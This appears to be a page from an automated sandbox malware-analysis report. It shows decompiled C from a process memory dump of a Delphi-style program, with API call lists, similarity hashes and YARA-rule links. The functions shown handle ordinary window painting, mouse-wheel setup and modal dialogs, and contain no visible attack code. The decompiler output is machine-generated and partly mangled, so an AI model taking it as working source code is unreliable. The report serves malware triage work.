				_v12 = __edx;
				_v8 = __eax;
				if( *(_v8 + 0x165) != 0 ||  *(_v8 + 0x16c) > 0) {
					_v16 = GetWindowDC(E0044D590(_v8));
					_push(_t239);
					_push(0x44e64e);
					_push( *[fs:edx]);
					 *[fs:edx] = _t242;
					GetClientRect(E0044D590(_v8),  &_v32);
					GetWindowRect(E0044D590(_v8),  &_v48);
					MapWindowPoints(0, E0044D590(_v8),  &_v48, 2);
					OffsetRect( &_v32,  ~(_v48.left),  ~(_v48.top));
					ExcludeClipRect(_v16, _v32, _v32.top, _v32.right, _v32.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					InflateRect( &_v32,  *(_v8 + 0x16c),  *(_v8 + 0x16c));
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					if( *(_v8 + 0x165) != 0) {
						_t210 = 0;
						if( *(_v8 + 0x163) != 0) {
							_t210 = 0 +  *((intOrPtr*)(_v8 + 0x168));
						}
						if( *(_v8 + 0x164) != 0) {
							_t210 = _t210 +  *((intOrPtr*)(_v8 + 0x168));
						}
						_t236 = GetWindowLongA(E0044D590(_v8), 0xfffffff0);
						if(( *(_v8 + 0x162) & 0x00000001) != 0) {
							_v48.left = _v48.left - _t210;
						}
						if(( *(_v8 + 0x162) & 0x00000002) != 0) {
							_v48.top = _v48.top - _t210;
						}
						if(( *(_v8 + 0x162) & 0x00000004) != 0) {
							_v48.right = _v48.right + _t210;
						}
						if((_t236 & 0x00200000) != 0) {
							_t198 =  *0x4bae68; // 0x4bc904
							_v48.right = _v48.right +  *((intOrPtr*)( *_t198))(0x14);
						}
						if(( *(_v8 + 0x162) & 0x00000008) != 0) {
							_v48.bottom = _v48.bottom + _t210;
						}
						if((_t236 & 0x00100000) != 0) {
							_t195 =  *0x4bae68; // 0x4bc904
							_v48.bottom = _v48.bottom +  *((intOrPtr*)( *_t195))(0x15);
						}
						DrawEdge(_v16,  &_v48,  *(0x4a0db4 + ( *(_v8 + 0x163) & 0x000000ff) * 4) |  *(0x4a0dc4 + ( *(_v8 + 0x164) & 0x000000ff) * 4),  *(_v8 + 0x162) & 0x000000ff |  *(0x4a0dd4 + ( *(_v8 + 0x165) & 0x000000ff) * 4) |  *(0x4a0de4 + ( *(_v8 + 0x1a5) & 0x000000ff) * 4) | 0x00002000);
					}
					IntersectClipRect(_v16, _v48.left, _v48.top, _v48.right, _v48.bottom);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					OffsetRect( &_v48,  ~_v48,  ~(_v48.top));
					FillRect(_v16,  &_v48, E00428C98( *((intOrPtr*)(_v8 + 0x170))));
					_pop(_t218);
					 *[fs:eax] = _t218;
					_push(0x44e655);
					return ReleaseDC(E0044D590(_v8), _v16);
				} else {
					 *((intOrPtr*)( *_v8 - 0x10))();
					_t207 = E0043373C(E00433634());
					if(_t207 != 0) {
						_t207 = _v8;
						if(( *(_t207 + 0x52) & 0x00000002) != 0) {
							_t207 = E00433E88(E00433634(), 0, _v8);
						}
					}
					return _t207;
				}
			}

0x0044e3e9
0x0044e3eb
0x0044e3f1
0x0044e3f4
0x0044e401
0x0044e421
0x0044e426
0x0044e427
0x0044e42c
0x0044e42f
0x0044e43f
0x0044e451
0x0044e467
0x0044e47c
0x0044e495
0x0044e4a0
0x0044e4a1
0x0044e4a2
0x0044e4a3
0x0044e4b3
0x0044e4be
0x0044e4bf
0x0044e4c0
0x0044e4c1
0x0044e4cc
0x0044e4d2
0x0044e4de
0x0044e4e3
0x0044e4e3
0x0044e4f3
0x0044e4f8
0x0044e4f8
0x0044e50e
0x0044e51a
0x0044e51c
0x0044e51c
0x0044e529
0x0044e52b
0x0044e52b
0x0044e538
0x0044e53a
0x0044e53a
0x0044e543
0x0044e547
0x0044e550
0x0044e550
0x0044e55d
0x0044e55f
0x0044e55f
0x0044e568
0x0044e56c
0x0044e575
0x0044e575
0x0044e5d5
0x0044e5d5
0x0044e5ee
0x0044e5f9
0x0044e5fa
0x0044e5fb
0x0044e5fc
0x0044e60d
0x0044e629
0x0044e630
0x0044e633
0x0044e636
0x0044e64d
0x0044e655
0x0044e65d
0x0044e665
0x0044e66c
0x0044e66e
0x0044e675
0x0044e681
0x0044e681
0x0044e675
0x0044e68c
0x0044e68c

APIs

GetWindowDC.USER32(00000000), ref: 0044E41C
GetClientRect.USER32 ref: 0044E43F
GetWindowRect.USER32 ref: 0044E451
MapWindowPoints.USER32 ref: 0044E467
OffsetRect.USER32 ref: 0044E47C
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0044E495
InflateRect.USER32 ref: 0044E4B3
GetWindowLongA.USER32(00000000,000000F0), ref: 0044E509
DrawEdge.USER32(?,?,00000000,00000008), ref: 0044E5D5
IntersectClipRect.GDI32(?,?,?,?,?), ref: 0044E5EE
OffsetRect.USER32 ref: 0044E60D
FillRect.USER32(?,?,00000000), ref: 0044E629
ReleaseDC.USER32(00000000,?), ref: 0044E648

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$ClipOffset$ClientDrawEdgeExcludeFillInflateIntersectLongPointsRelease
String ID:
API String ID: 3115931838-0
Opcode ID: ee1e6f169d8936a547ba9efe69f8abffdf3bc1b8a8d86ca2d85d024deec98132
Instruction ID: c9e9ca00c4e4b89094c454927fe7a0bd601b21f3e3b150271b7a925d75cc01b5
Opcode Fuzzy Hash: ee1e6f169d8936a547ba9efe69f8abffdf3bc1b8a8d86ca2d85d024deec98132
Instruction Fuzzy Hash: 8591F671E04248AFDB01DBA9C985EEEB7F9AF09304F1440A6F518E7252C779AE44CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040767C, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 61
registryclipboardwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040767C(intOrPtr* __eax, int* __edx, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr* _v8;
				struct HWND__* _t19;
				int* _t20;
				int* _t26;
				int* _t27;

				_t26 = _t20;
				_t27 = __edx;
				_v8 = __eax;
				_t19 = FindWindowA("MouseZ", "Magellan MSWHEEL");
				 *_v8 = RegisterClipboardFormatA("MSWHEEL_ROLLMSG");
				 *_t27 = RegisterClipboardFormatA("MSH_WHEELSUPPORT_MSG");
				 *_t26 = RegisterClipboardFormatA("MSH_SCROLL_LINES_MSG");
				if( *_t27 == 0 || _t19 == 0) {
					 *_a8 = 0;
				} else {
					 *_a8 = SendMessageA(_t19,  *_t27, 0, 0);
				}
				if( *_t26 == 0 || _t19 == 0) {
					 *_a4 = 3;
				} else {
					 *_a4 = SendMessageA(_t19,  *_t26, 0, 0);
				}
				return _t19;
			}

0x00407683
0x00407685
0x00407687
0x00407699
0x004076a8
0x004076b4
0x004076c0
0x004076c5
0x004076e4
0x004076cb
0x004076db
0x004076db
0x004076e9
0x00407706
0x004076ef
0x004076ff
0x004076ff
0x00407713

APIs

FindWindowA.USER32 ref: 00407694
RegisterClipboardFormatA.USER32(MSWHEEL_ROLLMSG), ref: 004076A0
RegisterClipboardFormatA.USER32(MSH_WHEELSUPPORT_MSG), ref: 004076AF
RegisterClipboardFormatA.USER32(MSH_SCROLL_LINES_MSG), ref: 004076BB
SendMessageA.USER32 ref: 004076D3
SendMessageA.USER32 ref: 004076F7

Strings

MouseZ, xrefs: 0040768F
MSH_WHEELSUPPORT_MSG, xrefs: 004076AA
MSH_SCROLL_LINES_MSG, xrefs: 004076B6
MSWHEEL_ROLLMSG, xrefs: 0040769B
Magellan MSWHEEL, xrefs: 0040768A

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardFormatRegister$MessageSend$FindWindow
String ID: MSH_SCROLL_LINES_MSG$MSH_WHEELSUPPORT_MSG$MSWHEEL_ROLLMSG$Magellan MSWHEEL$MouseZ
API String ID: 1416857345-3736581797
Opcode ID: 1e86d51e94f6e260601bf7ec413160ed51caaddc5ba61ebbac31d1afdf99388b
Instruction ID: e8809af92ddc94ce4b29c9ec2cb8913ee3e21aaf89ab545646c2b3b64a23137a
Opcode Fuzzy Hash: 1e86d51e94f6e260601bf7ec413160ed51caaddc5ba61ebbac31d1afdf99388b
Instruction Fuzzy Hash: 77115470A4C305AFE3019F65CC41B6AB7A8EF44350F20447AFD41AB2C1D6B87C40D76A

Uniqueness

Uniqueness Score: -1.00%

Function 00433E88, Relevance: 18.1, APIs: 12, Instructions: 142
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00433E88(void* __eax, void* __ecx, intOrPtr __edx) {
				intOrPtr _v8;
				struct HDC__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				char _v56;
				char _v72;
				void* __ebx;
				signed char _t43;
				signed int _t79;
				int _t80;
				int _t81;
				void* _t94;
				intOrPtr _t107;
				void* _t116;
				void* _t119;
				void* _t122;
				void* _t124;
				intOrPtr _t125;

				_t122 = _t124;
				_t125 = _t124 + 0xffffffbc;
				_t94 = __ecx;
				_v8 = __edx;
				_t116 = __eax;
				_t43 = GetWindowLongA(E0044D590(_v8), 0xffffffec);
				if((_t43 & 0x00000002) == 0) {
					return _t43;
				} else {
					GetWindowRect(E0044D590(_v8),  &_v44);
					OffsetRect( &_v44,  ~(_v44.left),  ~(_v44.top));
					_v12 = GetWindowDC(E0044D590(_v8));
					_push(_t122);
					_push(0x433fe3);
					_push( *[fs:edx]);
					 *[fs:edx] = _t125;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t119 = _t116;
					if(_t94 != 0) {
						_t79 = GetWindowLongA(E0044D590(_v8), 0xfffffff0);
						if((_t79 & 0x00100000) != 0 && (_t79 & 0x00200000) != 0) {
							_t80 = GetSystemMetrics(2);
							_t81 = GetSystemMetrics(3);
							InflateRect( &_v28, 0xfffffffe, 0xfffffffe);
							E0041B1E4(_v28.right - _t80, _t81, _v28.right, _v28.bottom - _t81,  &_v72, _v28.bottom);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t119 = _t119;
							FillRect(_v12,  &_v28, GetSysColorBrush(0xf));
						}
					}
					ExcludeClipRect(_v12, _v44.left + 2, _v44.top + 2, _v44.right - 2, _v44.bottom - 2);
					E00433A24( &_v56, 2);
					E00433848(_t119,  &_v56, _v12, 0,  &_v44);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x433fea);
					return ReleaseDC(E0044D590(_v8), _v12);
				}
			}

0x00433e89
0x00433e8b
0x00433e91
0x00433e93
0x00433e96
0x00433ea3
0x00433eab
0x00433ff0
0x00433eb1
0x00433ebe
0x00433ed3
0x00433ee6
0x00433eeb
0x00433eec
0x00433ef1
0x00433ef4
0x00433efe
0x00433eff
0x00433f00
0x00433f01
0x00433f02
0x00433f05
0x00433f12
0x00433f1c
0x00433f27
0x00433f30
0x00433f3f
0x00433f59
0x00433f65
0x00433f66
0x00433f67
0x00433f68
0x00433f69
0x00433f7a
0x00433f7a
0x00433f1c
0x00433f9f
0x00433fab
0x00433fbe
0x00433fc5
0x00433fc8
0x00433fcb
0x00433fe2
0x00433fe2

APIs

GetWindowLongA.USER32(00000000,000000EC), ref: 00433EA3
GetWindowRect.USER32 ref: 00433EBE
OffsetRect.USER32 ref: 00433ED3
GetWindowDC.USER32(00000000), ref: 00433EE1
GetWindowLongA.USER32(00000000,000000F0), ref: 00433F12
GetSystemMetrics.USER32 ref: 00433F27
GetSystemMetrics.USER32 ref: 00433F30
InflateRect.USER32 ref: 00433F3F
GetSysColorBrush.USER32 ref: 00433F6C
FillRect.USER32(?,?,00000000), ref: 00433F7A
ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00433F9F
ReleaseDC.USER32(00000000,?), ref: 00433FDD

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
String ID:
API String ID: 19621357-0
Opcode ID: cc4ba14c984228af9cde4c76db7193c50e96ad659ddc3643c38956547b0af42f
Instruction ID: dfeeb715b180da1d8bec3558f82ba9f17373f30b6f595d340cddae056295081d
Opcode Fuzzy Hash: cc4ba14c984228af9cde4c76db7193c50e96ad659ddc3643c38956547b0af42f
Instruction Fuzzy Hash: 33414071E041096BDB00EEE9CC42EDFB7BDEF49314F5001AAF914F7281DA38AE418664

Uniqueness

Uniqueness Score: -1.00%

Function 00430370, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00430370(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x4bc933 != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x4bc920 = E0042FDB8(7, _t60, "EnumDisplayMonitors",  *0x4bc920, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}

0x00430379
0x0043037c
0x00430386
0x004303b6
0x004303bc
0x00430478
0x00430480
0x00430480
0x004303c4
0x004303c9
0x004303d4
0x004303df
0x004303e4
0x0043044d
0x00430465
0x00430476
0x00430461
0x00430461
0x00430461
0x00000000
0x0043044d
0x004303f0
0x004303ff
0x00000000
0x00000000
0x00430411
0x00430429
0x0043043f
0x00000000
0x00000000
0x00430445
0x00430447
0x00430447
0x00000000
0x00000000
0x00000000
0x00000000
0x00430429
0x0043039a
0x004303af
0x00000000

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 004303A9
GetSystemMetrics.USER32 ref: 004303CE
GetSystemMetrics.USER32 ref: 004303D9
GetClipBox.GDI32(?,?), ref: 004303EB
GetDCOrgEx.GDI32(?,?), ref: 004303F8
OffsetRect.USER32 ref: 00430411
IntersectRect.USER32(?,?,?), ref: 00430422
IntersectRect.USER32(?,?,?), ref: 00430438

Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C

Strings

EnumDisplayMonitors, xrefs: 00430388

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Rect$IntersectMetricsSystem$AddressClipDisplayEnumMonitorsOffsetProc
String ID: EnumDisplayMonitors
API String ID: 362875416-2491903729
Opcode ID: c0f749031e112393485ebe353422efa6aae5748b4cf40fa60d3d30f78c2b83a7
Instruction ID: 9a47fb48cc81c6a3b068b433de160dedd5cab5b48cf9d5f61139c02cf2adac41
Opcode Fuzzy Hash: c0f749031e112393485ebe353422efa6aae5748b4cf40fa60d3d30f78c2b83a7
Instruction Fuzzy Hash: 4631F2B1E4110DAFDB10DFA5CC849EF77BCAB59704F00522BFA15E3241E7389A058BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0044B720, Relevance: 16.6, APIs: 11, Instructions: 133
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E0044B720(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				int _v84;
				void* _v96;
				int _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t59;
				intOrPtr* _t88;
				intOrPtr _t107;
				void* _t108;
				struct HDC__* _t110;
				void* _t113;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t116 = _t118;
				_t119 = _t118 + 0xffffff94;
				_push(_t108);
				_t113 = __edx;
				_t88 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E0044A2C0(_t88) != 0) {
						_t38 = E0044B244(_t88, _t88, _t113, _t108, _t113);
					} else {
						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
					}
					return _t38;
				} else {
					_t110 = GetDC(0);
					 *((intOrPtr*)( *_t88 + 0x44))();
					 *((intOrPtr*)( *_t88 + 0x44))();
					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
					ReleaseDC(0, _t110);
					_v8 = CreateCompatibleDC(0);
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t119;
					_t59 = BeginPaint(E0044D590(_t88),  &_v80);
					E00447F3C(_t88, _v8, 0x14, _v8);
					 *((intOrPtr*)(_t113 + 4)) = _v8;
					E0044B720(_t88, _t113);
					 *((intOrPtr*)(_t113 + 4)) = 0;
					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x44b872, _t116);
					 *((intOrPtr*)( *_t88 + 0x44))();
					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
					EndPaint(E0044D590(_t88),  &_v80);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x44b879);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

0x0044b721
0x0044b723
0x0044b728
0x0044b729
0x0044b72b
0x0044b734
0x0044b740
0x0044b75f
0x0044b74d
0x0044b753
0x0044b753
0x0044b87f
0x0044b769
0x0044b770
0x0044b779
0x0044b787
0x0044b794
0x0044b79a
0x0044b7a6
0x0044b7b6
0x0044b7c4
0x0044b7d3
0x0044b7e8
0x0044b7f0
0x0044b7f7
0x0044b7fe
0x0044b815
0x0044b823
0x0044b82f
0x0044b840
0x0044b847
0x0044b84a
0x0044b84d
0x0044b85a
0x0044b863
0x0044b871
0x0044b871

APIs

GetDC.USER32(00000000), ref: 0044B76B
CreateCompatibleBitmap.GDI32(00000000,?), ref: 0044B78F
ReleaseDC.USER32(00000000,00000000), ref: 0044B79A
CreateCompatibleDC.GDI32(00000000), ref: 0044B7A1
SelectObject.GDI32(?,?), ref: 0044B7B1
BeginPaint.USER32(00000000,?), ref: 0044B7D3
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0044B82F
EndPaint.USER32(00000000,?), ref: 0044B840
SelectObject.GDI32(?,?), ref: 0044B85A
DeleteDC.GDI32(?), ref: 0044B863
DeleteObject.GDI32(?), ref: 0044B86C

Part of subcall function 0044B244: BeginPaint.USER32(00000000,?), ref: 0044B26A
Part of subcall function 0044B244: EndPaint.USER32(00000000,?), ref: 0044B35E

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$BitmapRelease
String ID:
API String ID: 3867285559-0
Opcode ID: f7b16ee8eebf37fba86433664ab73bc9cb111bbf7377b640bd226e6b47817914
Instruction ID: d5fcfde6073ac6bc32e8dc026f5d716762d7b2232e364763bc04e6438489a056
Opcode Fuzzy Hash: f7b16ee8eebf37fba86433664ab73bc9cb111bbf7377b640bd226e6b47817914
Instruction Fuzzy Hash: A441FC75B00204AFD700EBA9CD85B9EB7F8EF48704F10447AF905EB281DA79DD058B55

Uniqueness

Uniqueness Score: -1.00%

Function 00463EC4, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 144
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00463EC4(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				void* _t107;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t107 = __ecx;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x46418c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E0044557C();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x4baf3c; // 0x426434
					E0040656C(_t50, _t107,  &_v36);
					E0040CAC4(_v36, 1);
					E00403DEC();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x4bcb7c; // 0x1c41284
				E00466448(_t56);
				_push(_t127);
				_push(0x46416f);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x4a0f38; // 0x0
				_v20 = _t60;
				_t61 =  *0x4bcb80; // 0x1c40e90
				_t62 =  *0x4bcb80; // 0x1c40e90
				E0041C8B8( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t65 =  *0x4bcb80; // 0x1c40e90
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x4bcb80; // 0x1c40e90
				_v22 =  *((intOrPtr*)(_t66 + 0x44));
				_t68 =  *0x4bcb80; // 0x1c40e90
				E00465408(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t70 =  *0x4bcb80; // 0x1c40e90
				_v28 =  *((intOrPtr*)(_t70 + 0x48));
				_v16 = E0045E23C(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x46414d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00463E14(_v8);
				_push(_t127);
				_push(0x4640ac);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E0044D590(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x4bcb7c; // 0x1c41284
					E00467268(_t80, _t124, _t125);
					_t82 =  *0x4bcb7c; // 0x1c41284
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E00463D74(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E0044D590(_v8), 0xb001, 0, 0);
				_t90 = E0044D590(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x4640b3);
				return E00463E0C();
			}

0x00463ec4
0x00463ec4
0x00463ec4
0x00463ec4
0x00463ec5
0x00463ec7
0x00463eca
0x00463ecb
0x00463ece
0x00463ed1
0x00463ed6
0x00463ed7
0x00463edc
0x00463edf
0x00463ee2
0x00463eee
0x00463f17
0x00463f1c
0x00463f2b
0x00463f30
0x00463f30
0x00463f3c
0x00463f4a
0x00463f4a
0x00463f4f
0x00463f54
0x00463f59
0x00463f60
0x00463f61
0x00463f66
0x00463f69
0x00463f6f
0x00463f7b
0x00463f7e
0x00463f83
0x00463f86
0x00463f8e
0x00463f98
0x00463f9d
0x00463fa5
0x00463fa8
0x00463fb1
0x00463fb7
0x00463fbc
0x00463fc1
0x00463fc9
0x00463fd3
0x00463fd8
0x00463fd9
0x00463fde
0x00463fe1
0x00463fe7
0x00463fee
0x00463fef
0x00463ff4
0x00463ff7
0x0046400c
0x00464016
0x0046401c
0x0046401c
0x00464021
0x00464026
0x00464032
0x0046404d
0x00464052
0x00464052
0x00464034
0x00464037
0x00464037
0x0046405a
0x00464060
0x00464064
0x00464079
0x00464081
0x0046408f
0x00464093
0x00464093
0x00464098
0x0046409b
0x0046409e
0x004640ab

APIs

GetCapture.USER32 ref: 00463F35
GetCapture.USER32 ref: 00463F44
SendMessageA.USER32 ref: 00463F4A
ReleaseCapture.USER32 ref: 00463F4F
GetActiveWindow.USER32 ref: 00463F76
SendMessageA.USER32 ref: 0046400C
SendMessageA.USER32 ref: 00464079
GetActiveWindow.USER32 ref: 00464088

Strings

4dB, xrefs: 00463F17

Memory Dump Source

Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp Download File
Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp Download File

Similarity

API ID: CaptureMessageSend$ActiveWindow$Release
String ID: 4dB
API String ID: 862346643-1163926081
Opcode ID: 8f80d153e7aa81b56968d1b96ef09e346944e40b7c1c645c770cb4ad0a6257c5
Instruction ID: 725272d2471761a726112e911ae94c7e852222784f40e3636587b23b8a63c46d
Opcode Fuzzy Hash: 8f80d153e7aa81b56968d1b96ef09e346944e40b7c1c645c770cb4ad0a6257c5
Instruction Fuzzy Hash: 1C514130A04244EFDB00EF65D986B9D77F1EB49704F1140BAF804AB3A2E779AE40DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0044B39C, Relevance: 15.2, APIs: 10, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0044B39C(void* __eax, struct HDC__* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				void* __ebx;
				int _t79;
				struct HDC__* _t134;
				int _t135;
				void* _t136;
				void* _t155;
				void* _t156;
				void* _t157;
				struct HDC__* _t158;
				intOrPtr* _t159;

				_t137 = __ecx;
